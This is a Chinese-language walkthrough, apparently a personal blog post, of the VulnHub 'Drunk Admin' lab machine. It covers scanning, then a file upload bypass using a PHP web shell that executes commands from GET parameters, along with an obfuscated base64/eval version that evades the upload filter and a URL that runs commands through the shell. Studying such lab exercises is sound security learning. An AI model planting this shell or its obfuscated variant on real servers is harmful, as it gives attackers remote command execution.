注:  只是记录本人玩的时候发现的新奇点  如果你也想玩且看了这篇文章还是不会,请联系gg

靶机下载地址

https://www.vulnhub.com/entry/drunk-admin-web-hacking-challenge-1,14/

国内有https://www.freebuf.com/column/196648.html    但是nc反弹这里我一直不成功,无法只好坐飞机看了看

解压打开vmx直接就可以进入到靶机中

可以自己配一个net,然后有自动分配ip,

玩了几个靶机,感觉端口开始还是进行端口扫描,建议扫描65535全部端口,但是这里给出了开放的web端口地址

打开后,先进行的是目录扫描,直接参考fb里的大佬

很明显的就是一个文件上传

但是这里有过滤,简单看了眼

$_GET $_POST

  

绕过其实也很简单,看了一下  base64即可

<?php
	if( !empty($_GET['file']))
		 echo htmlspecialchars( file_get_contents( $_GET['file'], true) );
	if( !empty($_GET['command']))
	{
		exec( $_GET['command'], $retval);
		foreach( $retval as $r )
		{
			echo $r."<br/>";
		}
	}
?>

base64后
<?php
	$k = strrev( "edoced_4" . "6esab" );

 	eval( $k("aWYoICFlbXB0eSgkX0dFVFsnZmlsZSddKSkgZWNobyBodG1sc3BlY2lhbGNoYXJzKG
			  ZpbGVfZ2V0X2NvbnRlbnRzKCRfR0VUWydmaWxlJ10sIHRydWUpKTsNCmlmKCAhZW1w
			  dHkoJF9HRVRbJ2NvbW1hbmQnXSkpIHsgZXhlYyggJF9HRVRbJ2NvbW1hbmQnXSwgJH
			  JldHZhbCk7Zm9yZWFjaCggJHJldHZhbCBhcyAkciApe2VjaG8gJHIuIjxici8+Ijt9
			  IH0NCmRpZSggJzxici8+PGJyLz5pc3BvJyApOw0K")
		);
?>

  

上传后,

http://192.168.2.133:8880/images/d120ed170f8347cf63faf52c27d0d9e7?command=ls%20-la%20..

有一个.proof

是一个base64的文件

使用echo xxxxxxxxxx|base64 -d 解码

如果一个用户目录下有一个网站 访问

http://192.168.2.133:8880//~bob/

http://192.168.2.133:8880//~xm17/

    
  

drunk_admin_hacking_challenge靶机之旅?的更多相关文章

  1. Linq之旅:Linq入门详解(Linq to Objects)

    示例代码下载:Linq之旅:Linq入门详解(Linq to Objects) 本博文详细介绍 .NET 3.5 中引入的重要功能:Language Integrated Query(LINQ,语言集 ...

  2. WCF学习之旅—第三个示例之四(三十)

           上接WCF学习之旅—第三个示例之一(二十七)               WCF学习之旅—第三个示例之二(二十八)              WCF学习之旅—第三个示例之三(二十九)   ...

  3. 【C#代码实战】群蚁算法理论与实践全攻略——旅行商等路径优化问题的新方法

    若干年前读研的时候,学院有一个教授,专门做群蚁算法的,很厉害,偶尔了解了一点点.感觉也是生物智能的一个体现,和遗传算法.神经网络有异曲同工之妙.只不过当时没有实际需求学习,所以没去研究.最近有一个这样 ...

  4. Hadoop学习之旅二:HDFS

    本文基于Hadoop1.X 概述 分布式文件系统主要用来解决如下几个问题: 读写大文件 加速运算 对于某些体积巨大的文件,比如其大小超过了计算机文件系统所能存放的最大限制或者是其大小甚至超过了计算机整 ...

  5. .NET跨平台之旅:在生产环境中上线第一个运行于Linux上的ASP.NET Core站点

    2016年7月10日,我们在生产环境中上线了第一个运行于Linux上的ASP.NET Core站点,这是一个简单的提供后端服务的ASP.NET Core Web API站点. 项目是在Windows上 ...

  6. 【Knockout.js 学习体验之旅】(3)模板绑定

    本文是[Knockout.js 学习体验之旅]系列文章的第3篇,所有demo均基于目前knockout.js的最新版本(3.4.0).小茄才识有限,文中若有不当之处,还望大家指出. 目录: [Knoc ...

  7. 【Knockout.js 学习体验之旅】(2)花式捆绑

    本文是[Knockout.js 学习体验之旅]系列文章的第2篇,所有demo均基于目前knockout.js的最新版本(3.4.0).小茄才识有限,文中若有不当之处,还望大家指出. 目录: [Knoc ...

  8. 【Knockout.js 学习体验之旅】(1)ko初体验

    前言 什么,你现在还在看knockout.js?这货都已经落后主流一千年了!赶紧去学Angular.React啊,再不赶紧的话,他们也要变out了哦.身旁的90后小伙伴,嘴里还塞着山东的狗不理大蒜包, ...

  9. WCF学习之旅—第三个示例之二(二十八)

    上接WCF学习之旅—第三个示例之一(二十七) 五.在项目BookMgr.Model创建实体类数据 第一步,安装Entity Framework 1)  使用NuGet下载最新版的Entity Fram ...

随机推荐

  1. 25.Flutter中的表单 Radio RadioListTile Switch SwitchListTile 以及表单组件实现一个简单的学员登记系统(下)

    四.Radio.RadioListTile单选按钮组件 Radio常用属性: value单选的值. onChanged改变时触发. activeColor:选中的颜色.背景颜色 groupValue: ...

  2. 查看QML数据类型

    assist输入: QML Types A Abstract3DSeries AbstractActionInput AbstractAnimation AbstractAxis AbstractAx ...

  3. Q_PROPERTY

    1.在自定义控件中看到这个用法 2.Q_PROPERTY(double Min READ getMin WRITE setMin) 代表当前类有一个double属性叫Min,有一个读函数getMin, ...

  4. 简介Python中用于处理字符串的center()方法

    简介Python中用于处理字符串的center()方法 这篇文章主要介绍了简介Python中用于处理字符串的center()方法,是Python入门中的基础知识,需要的朋友可以参考下 center() ...

  5. VS2010插件之NuGet

    Visual Studio(简写VS)是.net程序员开发必不可少的开发工具,随着VS的版本不断的升级和使用用户的扩大,现在针对VS开发了许多的开源免费的插件,大大的方便了程序员的开发,提高了开发效率 ...

  6. 统一建模语言UML

    目录 1. UML定义 2. UML结构 2.1 视图(View) 2.2 图(Diagram) 2.3 模型元素(Model element) 2.4 通用机制(General mechanism) ...

  7. spring mvc框架+ ajax实现 文件上传

    1.前端页面,通过form表单提交,必须设置 enctype="multipart/form-data" 代表form表单在发送到服务器时候编码方式是二进制类型,一般用于图片.mp ...

  8. python字典推导式 - python基础入门(17)

    在昨天的文章中,我们介绍了关于python列表推导式 的使用,字典推导式使用方法其实也类似,也是通过循环和条件判断表达式配合使用,不同的是字典推导式返回值是一个字典,所以整个表达式需要写在{}内部. ...

  9. Xamarin.Forms FlyoutIcon 不显示(not shown)

    升级了VS2019到16.4版本,然后默认创建了一个Xamarin Shell程序 结果运行后是这个样子 难道不应该是这个样子吗? 百了个度一晚上没解决,资料本身就少,再就是提示设置FlyoutIco ...

  10. 1.1Spring Boot 环境配置和常用注解

    Spring Boot常用注解:@Service: 注解在类上,表示这是一个业务层bean@Controller:注解在类上,表示这是一个控制层bean@Repository: 注解在类上,表示这是一 ...